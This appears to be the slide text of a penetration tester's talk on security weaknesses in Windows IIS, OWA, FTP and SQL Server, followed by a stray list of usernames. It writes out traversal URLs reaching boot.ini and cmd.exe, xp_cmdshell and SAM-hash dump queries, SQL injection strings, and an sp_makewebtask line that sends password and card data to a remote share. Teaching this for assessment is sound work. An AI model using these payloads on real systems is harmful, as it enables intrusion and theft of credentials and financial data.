Analyst at Digital Defense – 5 years experience penetration testing – Contact: [email protected] • Digital Defense – Founded January 2000 – Provide recurring assessment services – Specialize in financial industry
sit through this? – Learn how crackers get in – Learn how to assess your own systems – See why network worms are so effective – Demonstrate why a patch needs to be applied – Actually verify that a patch worked – Check new software for related problems
Windows? – Over 30% of all of web sites run on Windows – Popular online banking and e-commerce platform – Incredibly easy to install and start using – Most services have insecure default settings – Isn’t it secure with patches? Just wait a week…
IIS? – Microsoft’s Web Server Product – Standard component of Windows 2000+ – Aims to be easy to use and extend – Horrible security architecture – Most features are enabled by default – Every version to date has been vulnerable to a remote shell granting attack in its default configuration.
used? – Corporate Web Sites – E-Commerce Sites – Online Banking Systems – Intranet/Internal Sites – With other products • Sendmail for Windows – Various “appliances” • Cisco VOIP systems
used? – Provided with the operating system – Very user-friendly configuration – Large number of ASP/CF developers – Huge feature set, easy to extend – Integrates with a Windows network – Decent performance by comparison
an ISAPI extension? – Adds functionality to IIS – Usually in the form of a DLL – ASP, CFML, PHP are extensions – Usually tied to specific suffix (.asp, .ida) • Types of security problems – Buffer Overflows – Information Disclosure
they such a security risk? – Code is not as well reviewed as core IIS – Extensions are enabled by default – Extension code can execute as SYSTEM • Where are the extensions shown? – Open Internet Services Manager – Select Web Site -> Properties – Home Directory -> Configuration
Execution – Overflow in ISM.dll (.htr) • Overflow in URL at ~3000 bytes • Exploit code was released 2 years ago • Only affects pre-SP6 IIS 4.0 servers – Overflow in IDQ.dll (.idq) • Overflow in Host header at ~220 bytes • “Code Red” used this to propagate • Affects both IIS 4.0 and 5.0
Execution – Overflow in MSW3PRT.dll (.printer) • Overflow is in the Host: header at ~240 bytes • Exploit code in wide circulation and very effective • Affects Windows 2000 / IIS 5.0 only – Overflow in ActiveState PerlIIS.dll (.plx) • Overflow in URL at ~340 bytes • Exploit code in circulation • Affects ActiveState Perl 5.6.1 < build 630
(almost) – There are only a few extensions most people actually need: .asp, .asa, .shtml, .shtm. – Extensions like .php and .cfml are usually ok provided that they are at the latest patch level.
with sample scripts – Demonstrate possibly dangerous features – Included as part of a default install – Have absolutely no access control – Unaffected by service packs and hotfixes – Often located in a different volume and added as a virtual directory, allowing other vulnerabilities to be further exploited.
Traversal? – Most file systems use two special directory names to refer to the current and parent directory. – A single period “.” refers to the current directory. – A double period “..” refers to the directory above. – Directory traversal bugs are dependent on these special directory names to access files outside of the defined root directory
Win9x “…” – Windows 9x supports multiple-dot parent paths • http://server/……………/autoexec.bat • http://server/……/windows/command.com?echo+hello – Works on Win9x machines running IIS or PWS – Other web servers on Win9x have been vulnerable
UNICODE – Windows supports a two-byte character encoding system called “UNICODE”. – Alternate character sets can used to make web requests by requesting their hexified values – The “/” and “\” characters can be represented with their UNICODE counterparts and older IIS versions will allow requests UNDER the web root. – Affects IIS 4.0 and IIS 5.0 – Other web servers may be affected
UNICODE – Example: (%c0%af = “/”) • http://server/.. %c0%af.. %c0%af../boot.ini – Number of variations depends on installed langs – Possible to execute \winnt\system32\cmd.exe – Exploited by many different worms – Very popular exploit among “kids”
Double Decode – Requests for files in an executable directory are hex-decoded twice and the final result is not checked for parent paths. – Example: • %25 = “%” AND %5c = “\” • Request: http://server/scripts/..%255c../ • First Decode: http://server/scripts/..%5c../ • Second Decode: http://server/scripts/..\../ – IIS 3.0, 4.0, 5.0 are affected
– DAV is Distributed Authoring and Versioning – WebDav provides content mgmt via HTTP – WebDav is accessed as HTTP methods – XML used for complex requests – A “normal” web request GET / HTTP/1.0 – A WebDav request PUT /newpage.html HTTP/1.0
– OPTIONS • OPTIONS / HTTP/1.0 • Returns a list of allowed HTTP methods • Methods in Allow: are accessible – SEARCH • Able to retrieve a directory listing through XML
– PUT • Common among misconfigured IIS 4.0 servers • Allows direct file uploads via WebDav (FrontPage) – DELETE • Common among misconfigured IIS 4.0 servers • Allows deletion of any file in the web root
– MOVE • Common among misconfigured IIS 4.0 servers • Allows you to move any file or directory – MKDIR/MKCOL • Only found on machines with really bad permissions • Allows creation of directories
– COPY • Most servers allow this, but it rarely works • Copy / HTTP/1.0 • Destination: http://nuthaserver/newdir/ – PROPFIND • Allowed by default • Needs XML input to do anything interesting • Various DoS attacks with long args to this command
is practically guaranteed by the number of vulnerabilities in a default installation. • Microsoft’s “feature push” strategy to encourage upgrades ensures there will be always be new vulnerabilities. • The amount of effort, knowledge, and time required to effectively secure an IIS server means that only experienced, security-aware administrators, have a chance of succeeding. • Microsoft is making attempts to simplify the assessment and patching process by releasing free security tools.
IMS? – IMS supports the Simple Mail Transport Protocol – Part of Windows NT 4.0 Option Pack – Comes standard with Windows 2000 – Aims to be easy to use and configure – Often overlooked when it comes to security
“Bounce” messages can contain sensitive information about a company’s internal network and domain – The AUTH and XAUTH commands can be used to brute-force user accounts through SMTP
are misconfigured or buggy in a way that allows spam relaying. • The SMTP service can be used to gather sensitive information about a network • While a few DoS conditions exist, newer versions of Windows automatically restart a crashed service.
Outlook Web Access? – Web mail client for Microsoft Exchange – Runs on top of IIS 4.0 or 5.0 – Emulates the Outlook interface – Written in ASP, uses COM+ objects
exist? – All IIS vulnerabilities apply – Defaults to clear text HTTP transport – Anonymous access enabled by default – Allows exploitation of client-side bugs
IIS – Many people forget to include OWA machines when applying patches to their “web servers” – Crackers and worms don’t care what it is, as long as it’s running the IIS web server – Cracking the OWA machine provides full access to login and mail ASP scripts
Text – Many people run OWA across regular HTTP, allowing their login and email to be easily sniffed – Enabling SSL is not too difficult, provided you know how to configure SSL under IIS.
Default – A default install allows full access to the Global Address List to unauthenticated users – “Public Folders” are exactly that, viewable by anyone able to access the server
Side Bugs – It is possible to embed a hostile application into an email message and force it to run when a user reads their email via Internet Explorer – There are various “Cross Site Scripting” issues with OWA which could allow someone to read any cookies or email contents
is a fairly dangerous application to maintain just to provide access to email over the web. • The actual OWA scripts have been proven to be pretty solid, most of the issues are with the underlying IIS server or the default config. • If you do run OWA, please stay on top of IIS patches, disable anonymous access, and keep sensitive information out of “Public Folders”
the FTP service? – The File Transfer Protocol – THE method of transmitting stored files – Part of Windows NT 4.0 Option Pack – Comes standard with Windows 2000 – Easy to configure and use
exist? – Unencrypted login and transfer – Anonymous access by default – Predictable PASV port selection – SITE STATS information leak – STAT Globbing Attack
transfer – Authentication information is sent in clear text and trivial to capture – The actual file transfers are unencrypted and easy to sniff and extract
Default – The default installation allows access using the standard “anonymous” and “ftp” account – Systems with bad permissions for the FTP root are automatically turned into warez servers for the various pirate groups
– FTP uses one connection from the client to port 21 on the server as the “control” port – Directory listings and file transfers are done via a second connection – Active FTP uses a connection from the server to the client – Passive FTP opens a port on the server and the client connects to it
– Many FTP servers use single-incrementing port numbers for the “passive” data port – With MS FTP 4.0, it is possible to guess the next data port and steal another user’s file transfer – With MS FTP 5.0, a hijack attempt will just disconnect and the client’s FTP session becomes unusable – Automated tools exist to exploit this
Leak – The SITE STATS feature shows how many times each FTP command has been executed – An anonymous user can profile a FTP server to determine when other users are logging on – The statistics can reveal what privileged commands are being executed and at what time – Usage profiles can be used in conjunction with the PASV port attack to steal scheduled transfers
was never designed with security in mind. • The secondary data channel does not require authentication and is trivial to hijack. • If you must run FTP, please encrypt AND sign your files before transferring.
SQL Server? – Microsoft’s relational database product – Originally based on the Sybase engine – Often installed with other products – Ships by default on many vendor machines – “Personal” editions exist for client systems – Popular backend for web applications • E-Commerce • Financial Services
– Service runs as Administrator or SYSTEM – Default accounts are the biggest problem – SQL User Level Privilege Escalation – Service is easily located on the network – Dangerous Stored Procedures – Syntax optimal for SQL insertion attacks
Administrator or SYSTEM – A compromise of the “sa” account results in full access to the entire system – Any bugs in the listening service or query parser could result in a complete system compromise
the Biggest Problem – The all-powerful “sa” account often has no password set, newer versions try to force it. – The “probe” account in 6.5 is unprivileged, but gaining “sa” access is trivial in that version. – A network worm appeared in late November 2001, exploiting the default “sa” account and propagating via stored procedures.
Located on the Network – Use the SQLPing utility – Use osql -L – SQL Server can use these transports: • TCP/IP(TCP 1433, UDP 1433, 1434) • MS RPC (dynamic ports) • Named Pipes • IPX/SPX / AppleTalk / Banyan Vines
– The infamous xp_cmdshell EXEC master..xp_cmdshell “cmd.exe /c …” – Sending query results back to you via SMB EXEC master..sp_makewebtask “\\ip\tmp\test.html”, “SELECT username, password,cc from users” – Dump the SAM password hashes via xp_regread EXEC xp_regread HKLM, 'SECURITY\SAM\Domains\Account ','F'
SQL Insertion Attacks – Queries can be stacked via semi-colon SELECT * FROM cats WHERE id = 4; UPDATE USER SET … – Comments can be inserted inline SELECT * FROM users WHERE user = ‘bob’;-- ‘ AND password = “bad password” – The engine provides verbose error messages about SQL syntax problems
account is almost always equivalent to having local Administrator access to the SQL Server machine (hint: don’t run a database on your DC’s). • Since SQL Server supports so many different network protocols, a simple packet filter on ports 1433/1434 is usually not enough to restrict access. • Recent versions of MS-SQL (2k+) are slightly more secure out of the box, the “Typical” install only allows Domain Authentication.
hdm
yoshidashingo
kazzpapa3
lycorp_recruit_jp
fumiyasac0921
minorun365
tkikuchi
rrreeeyyy
onk
abemii
hogelog
salaboy
niwatakeru
keithpitt
nonsquared
destraynor
kneath
holman
geoffreycrofte
eileencodes
hannesfritz
maggiecrowley
geeforr
addyosmani
bkeepers
